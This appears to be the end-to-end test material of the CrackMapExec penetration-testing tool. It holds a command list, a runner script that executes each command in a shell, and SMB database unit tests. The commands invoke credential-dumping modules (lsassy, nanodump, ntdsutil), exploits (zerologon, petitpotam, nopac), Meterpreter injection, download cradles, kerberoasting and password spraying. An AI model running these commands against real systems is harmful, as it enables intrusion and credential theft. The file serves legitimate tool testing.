crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=disable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav -o MSG="Message: {}"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler -M petitpotam -M zerologon -M nopac -M dfscoerce -M enum_av -M enum_dns -M gpp_autologin -M gpp_password -M lsassy -M impersonate -M install_elevated -M ioxidresolver -M ms17-010 -M ntlmv1 -M runasppl -M shadowcoerce -M uac -M webdav -M wifi
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010 --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1 --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
##### SMB Anonymous Auth
crackmapexec smb TARGET_HOST -u '' -p '' -M zerologon
crackmapexec smb TARGET_HOST -u '' -p '' -M petitpotam
##### SMB Auth File
crackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce
crackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success
crackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt
##### LDAP
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --get-sid
crackmapexec ldap TARGET_HOST -u USERNAME -p '' --asreproast /tmp/output.txt
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --admin-count
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gmsa
##### LDAP Modules
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread -o TARGET=USERNAME ACTION=read
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership -o USER=USERNAME
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami --options
##### WINRM
crackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
crackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami
crackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --laps
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS
##### MSSQL
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS
##### MSSQL Modules
# crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD -M empire_exec
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
# a bit janky, but we try to enable RDP before testing RDP
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
##### RDP
crackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
crackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --nla-screenshot
##### SSH - Default test passwords and random key; switch these out if you want correct authentication
crackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD
crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce
crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success
crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt
crackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD --key-file data/test_key.priv
crackmapexec ssh TARGET_HOST -u USERNAME -p '' --key-file data/test_key.priv
##### FTP- Default test passwords and random key; switch these out if you want correct authentication
crackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD
crackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD --ls
crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce
crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success
crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt
================================================
FILE: tests/e2e_test.py
================================================
import argparse
import os
import subprocess
from rich.console import Console
def get_cli_args():
parser = argparse.ArgumentParser(description=f"Script for running end to end tests for CME")
parser.add_argument("-t", "--target", dest="target", required=True)
parser.add_argument("-u", "--user", "--username", dest="username", required=True)
parser.add_argument("-p", "--pass", "--password", dest="password", required=True)
parser.add_argument(
"-k",
"--kerberos",
action="store_true",
required=False,
help="Use kerberos authentication",
)
parser.add_argument(
"-v",
"--verbose",
action="store_true",
required=False,
help="Display full command output",
)
parser.add_argument(
"-e",
"--errors",
action="store_true",
required=False,
help="Display errors from commands",
)
parsed_args = parser.parse_args()
return parsed_args
def generate_commands(args):
lines = []
if args.kerberos:
kerberos = "-k"
else:
kerberos = ""
file_loc = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
commands_file = os.path.join(file_loc, "e2e_commands.txt")
with open(commands_file) as file:
for line in file:
if line.startswith("#"):
continue
line = line.strip()
line = line.replace("TARGET_HOST", args.target).replace("USERNAME", f'"{args.username}"').replace("PASSWORD", f'"{args.password}"').replace("KERBEROS ", kerberos)
lines.append(line)
return lines
def run_e2e_tests(args):
console = Console()
tasks = generate_commands(args)
result = subprocess.Popen(
"crackmapexec --version",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
version = result.communicate()[0].decode().strip()
with console.status(f"[bold green] :brain: Running {len(tasks)} test commands for cme v{version}...") as status:
passed = 0
failed = 0
while tasks:
task = tasks.pop(0)
result = subprocess.Popen(
str(task),
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
# pass in a "y" for things that prompt for it (--ndts, etc)
text = result.communicate(input=b"y")[0]
return_code = result.returncode
if return_code == 0:
console.log(f"{task.strip()} :heavy_check_mark:")
passed += 1
else:
console.log(f"[bold red]{task.strip()} :cross_mark:[/]")
failed += 1
if args.errors:
raw_text = text.decode("utf-8")
if "error" in raw_text.lower() or "failure" in raw_text.lower():
console.log(f"[bold red] Error Detected: {raw_text}")
if args.verbose:
# this prints sorta janky, but it does its job
console.log(f"[*] Results:\n{text.decode('utf-8')}")
console.log(f"Tests [bold green] Passed: {passed} [bold red] Failed: {failed}")
if __name__ == "__main__":
parsed_args = get_cli_args()
run_e2e_tests(parsed_args)
================================================
FILE: tests/test_smb_database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import pytest
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from cme.cmedb import delete_workspace, CMEDBMenu
from cme.first_run import first_run_setup
from cme.loaders.protocolloader import ProtocolLoader
from cme.logger import CMEAdapter
from cme.paths import WS_PATH
from sqlalchemy.dialects.sqlite import Insert
@pytest.fixture(scope="session")
def db_engine():
db_path = os.path.join(WS_PATH, "test/smb.db")
db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
yield db_engine
db_engine.dispose()
@pytest.fixture(scope="session")
def db_setup(db_engine):
proto = "smb"
# setup_logger()
logger = CMEAdapter()
first_run_setup(logger)
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
CMEDBMenu.create_workspace("test", p_loader, protocols)
protocol_db_path = p_loader.get_protocols()[proto]["dbpath"]
protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), "database")
database_obj = protocol_db_object(db_engine)
database_obj.reflect_tables()
yield database_obj
database_obj.shutdown_db()
delete_workspace("test")
@pytest.fixture(scope="function")
def db(db_setup):
yield db_setup
db_setup.clear_database()
@pytest.fixture(scope="session")
def sess(db_engine):
session_factory = sessionmaker(bind=db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
sess = Session()
yield sess
sess.close()
def test_add_host(db):
db.add_host(
"127.0.0.1",
"localhost",
"TEST.DEV",
"Windows Testing 2023",
False,
True,
True,
True,
False,
False,
)
inserted_host = db.get_hosts()
assert len(inserted_host) == 1
host = inserted_host[0]
assert host.id == 1
assert host.ip == "127.0.0.1"
assert host.hostname == "localhost"
assert host.os == "Windows Testing 2023"
assert host.smbv1 is False
assert host.signing is True
assert host.spooler is True
assert host.zerologon is True
assert host.petitpotam is False
assert host.dc is False
def test_update_host(db, sess):
host = {
"ip": "127.0.0.1",
"hostname": "localhost",
"domain": "TEST.DEV",
"os": "Windows Testing 2023",
"smbv1": True,
"signing": False,
"spooler": True,
"zerologon": False,
"petitpotam": False,
"dc": False,
}
iq = Insert(db.HostsTable)
sess.execute(iq, [host])
db.add_host(
"127.0.0.1",
"localhost",
"TEST.DEV",
"Windows Testing 2023 Updated",
False,
True,
False,
False,
False,
False,
)
inserted_host = db.get_hosts()
assert len(inserted_host) == 1
host = inserted_host[0]
assert host.id == 1
assert host.ip == "127.0.0.1"
assert host.hostname == "localhost"
assert host.os == "Windows Testing 2023 Updated"
assert host.smbv1 is False
assert host.signing is True
assert host.spooler is False
assert host.zerologon is False
assert host.petitpotam is False
assert host.dc is False
def test_add_credential():
pass
def test_update_credential():
pass
def test_remove_credential():
pass
def test_add_admin_user():
pass
def test_get_admin_relations():
pass
def test_remove_admin_relation():
pass
def test_is_credential_valid():
pass
def test_get_credentials():
pass
def test_get_credential():
pass
def test_is_credential_local():
pass
def test_is_host_valid():
pass
def test_get_hosts():
pass
def test_is_group_valid():
pass
def test_add_group():
pass
def test_get_groups():
pass
def test_get_group_relations():
pass
def test_remove_group_relations():
pass
def test_is_user_valid():
pass
def test_get_users():
pass
def test_get_user():
pass
def test_get_domain_controllers():
pass
def test_is_share_valid():
pass
def test_add_share():
pass
def test_get_shares():
pass
def test_get_shares_by_access():
pass
def test_get_users_with_share_access():
pass
def test_add_domain_backupkey():
pass
def test_get_domain_backupkey():
pass
def test_is_dpapi_secret_valid():
pass
def test_add_dpapi_secrets():
pass
def test_get_dpapi_secrets():
pass
def test_add_loggedin_relation():
pass
def test_get_loggedin_relations():
pass
def test_remove_loggedin_relations():
pass